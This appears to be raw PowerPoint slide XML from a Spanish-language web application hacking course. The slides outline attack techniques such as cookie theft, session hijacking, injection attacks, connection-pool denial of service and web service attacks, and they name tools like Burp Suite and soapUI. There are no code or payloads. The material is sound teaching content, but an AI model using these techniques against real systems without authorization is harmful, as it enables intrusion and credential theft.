              <a:rPr lang="es-BO" sz="3000" dirty="0"/>
              <a:t>Explotación de cookies: Si la cookie contiene </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="3000" dirty="0"/>
              <a:t>passwords</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="3000" dirty="0"/>
              <a:t> o identificadores de sesión, el atacante puede robar la cookie utilizando técnicas como script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="3000" dirty="0"/>
              <a:t>injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="3000" dirty="0"/>
              <a:t> y </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="3000" dirty="0"/>
              <a:t>eavesdropping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="3000" dirty="0"/>
              <a:t>. Los atacantes pueden replicar la cookie con el mismo o alterado </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="3000" dirty="0"/>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="3000" dirty="0"/>
              <a:t> o identificador de sesión para saltar la autenticación de la aplicación Web. Los atacantes pueden atrapar cookies utilizando herramientas como Paros Proxy, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="3000" dirty="0"/>
              <a:t>Burp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="3000" dirty="0"/>
              <a:t> Suite, etc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2058582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5. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Authorization</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Schemes</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>Manipulan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>solicitudes HTTP para subvertir los esquemas de autorización de la aplicación </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>modificando </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>los campos de entrada relacionados al ID de usuario, nombre de usuario, grupo de acceso, etc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29068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Vectores de ataque Web</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Es una ruta o medio para que un atacante pueda obtener acceso a la computadora o recursos de la red para realizar un ataque </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> o causar resultados maliciosos. Este ataque incluye manipulación de parámetros, XML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>poisoning</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>, validación de cliente, mala configuración de servidor, problemas de enrutamiento de servicio Web y </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>cross-site</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> scripting.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="937492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6. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Session</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> Management </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Mechanism</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>Los atacantes rompen un mecanismo de administración de sesión de la aplicación saltando los controles de autenticación y haciéndose pasar por usuarios privilegiados de la aplicación.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>Generación de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>token</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t> de sesión</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>1. Predicción</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>2. Manipulación</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>Manipulación de los </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>tokens</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t> de sesión</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>Session</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>Hijacking</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>Session</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t> Replay</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>3. Ataque MITM</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11338333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7. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Perform</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Attacks</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>En los ataques de inyección, los atacantes abastecen de entradas maliciosas hechas a mano que son sintácticamente </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>correctas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>de acuerdo al lenguaje interpretado utilizado para romper la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>prevención </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>normal de la aplicación. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="6"/>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="6"/>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LDAP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="6"/>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XPath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="6"/>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SMTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="6"/>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Commands</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="6"/>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Scripts </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19183031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8. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> Data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Connectivity</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Las cadenas de conexión a la DB son utilizadas para conectar aplicaciones a los motores de BD.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>Inyección </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>de conexión de cadena. Ambiente de autenticación delegada, el atacante inyecta parámetros de cadena de conexión agregando un punto y coma (;)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>2. Ataques </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Coonection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>String</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Parameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Pollution</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> (CSPP). Hash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Stealing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>, Port </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Scanning</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Hijack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Credentials</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1591852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8. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> Data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Connectivity</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>3. Pool de conexiones </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>DoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>. El atacante examina las opciones de conexión </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>pooling</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> de la aplicación, construye una cadena SQL larga y maliciosa y ejecuta múltiples consultas simultáneas para consumir todas las conexiones de la pool, causando que las consultas de los usuarios legítimos fallen.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8953868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n-US" dirty="0"/>
              <a:t>9. Attack Web App Client</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Los atacantes interactúan con aplicaciones del lado del servidor de maneras inesperadas para realizar acciones maliciosas contra los usuarios finales y acceder a datos no autorizados. Cross-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Site</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> Scripting. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Session</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Fixation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Redirection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Attacks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Frame</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Forgery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Privacy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Attacks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>. HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Header</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>. ActiveX </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Attacks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35400187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10. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Services</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600" dirty="0"/>
              <a:t>Los Servicios Web trabajan sobre las aplicaciones Web heredadas, cualquier ataque en el servicio Web será </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0" smtClean="0"/>
              <a:t>inmediatamente </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>expuesto </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0" smtClean="0"/>
              <a:t>subyacentemente </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>las aplicaciones de los negocios y vulnerabilidades lógicas para varios ataques.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>Probing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>Attacks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>, SOAP y XML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>Herramienta de ataque a Servicio Web: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>soapUI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0" smtClean="0"/>
              <a:t>carácterísticas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>: 1. Simulación de Servicio. 2. Prueba Funcional. 3. Prueba de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>Garga</a:t>
            </a:r>
            <a:r>
